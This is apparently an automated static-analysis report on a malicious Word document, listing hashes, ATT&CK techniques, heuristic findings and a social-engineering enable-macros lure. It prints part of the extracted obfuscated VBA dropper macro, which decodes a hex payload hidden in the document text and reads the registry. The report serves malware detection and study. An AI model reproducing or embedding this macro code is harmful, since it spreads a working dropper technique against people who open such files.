Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2805142aa5ef62a6…

MALICIOUS

Office (OLE)

2.93 MB Created: 2017-10-12 03:16:00 Authoring application: Microsoft Office Word First seen: 2019-10-01
MD5: c4d35f3263fef4a533e7403682a034c3 SHA-1: 93701b66d725eb6ad71806491ed8fbe4ce4d9eb6 SHA-256: 2805142aa5ef62a64843c67df9f73b2bdffda6e203d92ea6a4a7e2f7cf665a30
210 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information

The sample is a Microsoft Office document containing VBA macros, including an AutoOpen macro, which is a common technique for malware execution. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', indicating a social engineering lure to bypass security measures. The VBA code uses CreateObject and GetObject calls, suggesting it attempts to interact with the system or download/execute additional payloads. The obfuscated nature of the VBA code and the presence of macro-enablement lures point towards a downloader or dropper functionality.

Heuristics 8

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20802 bytes
SHA-256: 48351ef4e56dd7b0c2786c5409eab2c329c5215fe4462762df4964b252cd350e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Function qKYS2iQVEg4FY43WqoOChS3DDvnk2CLUcP8qhHNN(ByVal strAscii As String) As Byte

    Dim RYtBvveMA4iihZz66_AOEUkp7yCMRHdT_xHEK5_j As Byte
    Dim RK3KAn2cB66BjeDzhRGSIv9_gqQlnriq0q0xr2YM As Byte
    Dim lM5pMA2AL3QRKLwlA4taxHPaPGBTe58eUVyXqLdG As String * 1

    RYtBvveMA4iihZz66_AOEUkp7yCMRHdT_xHEK5_j = 0
    If (Len(strAscii) = 1) Then
        lM5pMA2AL3QRKLwlA4taxHPaPGBTe58eUVyXqLdG = Mid(strAscii, 1, 1)
        RK3KAn2cB66BjeDzhRGSIv9_gqQlnriq0q0xr2YM = Asc(lM5pMA2AL3QRKLwlA4taxHPaPGBTe58eUVyXqLdG)
        If (RK3KAn2cB66BjeDzhRGSIv9_gqQlnriq0q0xr2YM >= 65 And RK3KAn2cB66BjeDzhRGSIv9_gqQlnriq0q0xr2YM <= 70) Then
            RK3KAn2cB66BjeDzhRGSIv9_gqQlnriq0q0xr2YM = RK3KAn2cB66BjeDzhRGSIv9_gqQlnriq0q0xr2YM - 65 + 10
        Else
            RK3KAn2cB66BjeDzhRGSIv9_gqQlnriq0q0xr2YM = RK3KAn2cB66BjeDzhRGSIv9_gqQlnriq0q0xr2YM - 48
        End If
        RYtBvveMA4iihZz66_AOEUkp7yCMRHdT_xHEK5_j = RK3KAn2cB66BjeDzhRGSIv9_gqQlnriq0q0xr2YM
    End If
    qKYS2iQVEg4FY43WqoOChS3DDvnk2CLUcP8qhHNN = RYtBvveMA4iihZz66_AOEUkp7yCMRHdT_xHEK5_j

End Function

Private Function RM1T7I66GrJs_K6zHlfyVwS2wbt8WEEKC0LwRbwW(cb As Integer) As String

    Randomize
    Dim ngBkCrHfVGYnAOeEXWA6_9mFWBYQeAVQRONi6vxo As String
    ngBkCrHfVGYnAOeEXWA6_9mFWBYQeAVQRONi6vxo = "abcdefghijklmnopqrstuvwxyz"
    ngBkCrHfVGYnAOeEXWA6_9mFWBYQeAVQRONi6vxo = ngBkCrHfVGYnAOeEXWA6_9mFWBYQeAVQRONi6vxo & UCase(ngBkCrHfVGYnAOeEXWA6_9mFWBYQeAVQRONi6vxo) & "0123456789"

    For i = 1 To cb
        RandomString = RandomString & Mid$(ngBkCrHfVGYnAOeEXWA6_9mFWBYQeAVQRONi6vxo, Int(Rnd() * Len(ngBkCrHfVGYnAOeEXWA6_9mFWBYQeAVQRONi6vxo) + 1), 1)
    Next i

    RM1T7I66GrJs_K6zHlfyVwS2wbt8WEEKC0LwRbwW = RandomString

End Function

Private Function pgECTjVtJzKXsfSlVZnXfYb2NZRZZBJwQj8FSfac() As String
    Dim XS9lzpFK6xoa6yV7kEN_fT5Klz8Z0245oe3CJHMm As Document
    Dim uNGtxolQh_jy1xW4Np_0hGJ4uiMTtjpESqwscCbY As String
    Dim eiI1Ky3Ri_QjHM5O4CZgCtmZBGFC2uSad2MZZIkX As String * 1
    Dim eWAuu5X6kIoBDWmMXJr4SsOP7G5F_7Qmh21GTTvv As String * 1
    Dim Jzhl5gyiG02fhg4N7LmP0i6dS1kBVGT4eXljatJS As Byte
    Dim WkDH7LxxsWS50FWdqZR6zL5cBV601h7kWb8CiHUn As Byte
    Dim qtU_VyEnAsNli1Jbfr5dFxyaOy9QwjVK5tH5S5i3 As Long
    Dim gJrzvM1VsXnSBGJTXJbnnPRgy3gPkDk981XX7YF1 As Long
    Dim vfnAX38pKP88UWGsSa2swdAPDdJzJNL_4aS8rhjt As String
    Dim VR5wvbfdmv4XWdwiFzXKkzGY394K4x1ARzyF84kr As String
    Dim YwdeIP4REztTkA9mb7sl7w8Ouu5mGRaBewMPlrff As String

    uNGtxolQh_jy1xW4Np_0hGJ4uiMTtjpESqwscCbY = ActiveDocument.Paragraphs(ActiveDocument.Paragraphs.Count - 3).Range.Text
    YwdeIP4REztTkA9mb7sl7w8Ouu5mGRaBewMPlrff = ""
    For i = 1 To Len(uNGtxolQh_jy1xW4Np_0hGJ4uiMTtjpESqwscCbY) - 1 Step 2
        eiI1Ky3Ri_QjHM5O4CZgCtmZBGFC2uSad2MZZIkX = Mid(uNGtxolQh_jy1xW4Np_0hGJ4uiMTtjpESqwscCbY, i, 1)
        eWAuu5X6kIoBDWmMXJr4SsOP7G5F_7Qmh21GTTvv = Mid(uNGtxolQh_jy1xW4Np_0hGJ4uiMTtjpESqwscCbY, i + 1, 1)
        Jzhl5gyiG02fhg4N7LmP0i6dS1kBVGT4eXljatJS = qKYS2iQVEg4FY43WqoOChS3DDvnk2CLUcP8qhHNN(eiI1Ky3Ri_QjHM5O4CZgCtmZBGFC2uSad2MZZIkX)
        WkDH7LxxsWS50FWdqZR6zL5cBV601h7kWb8CiHUn = qKYS2iQVEg4FY43WqoOChS3DDvnk2CLUcP8qhHNN(eWAuu5X6kIoBDWmMXJr4SsOP7G5F_7Qmh21GTTvv)
        Value = Jzhl5gyiG02fhg4N7LmP0i6dS1kBVGT4eXljatJS * 16 + WkDH7LxxsWS50FWdqZR6zL5cBV601h7kWb8CiHUn
        YwdeIP4REztTkA9mb7sl7w8Ouu5mGRaBewMPlrff = YwdeIP4REztTkA9mb7sl7w8Ouu5mGRaBewMPlrff & Chr(Value)
    Next i
    
    pgECTjVtJzKXsfSlVZnXfYb2NZRZZBJwQj8FSfac = YwdeIP4REztTkA9mb7sl7w8Ouu5mGRaBewMPlrff

End Function

Private Function g_qnUIim8qCSOAGr5CPUsWu7Re687dtFPaGfxO85(KkMA5oWZ4OhublAQd2PkvJA8YEUmtow19nGfNNs_, regKey)
    On Error Resume Next
    KkMA5oWZ4OhublAQd2PkvJA8YEUmtow19nGfNNs_.RegRead regKey
    g_qnUIim8qCSOAGr5C
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.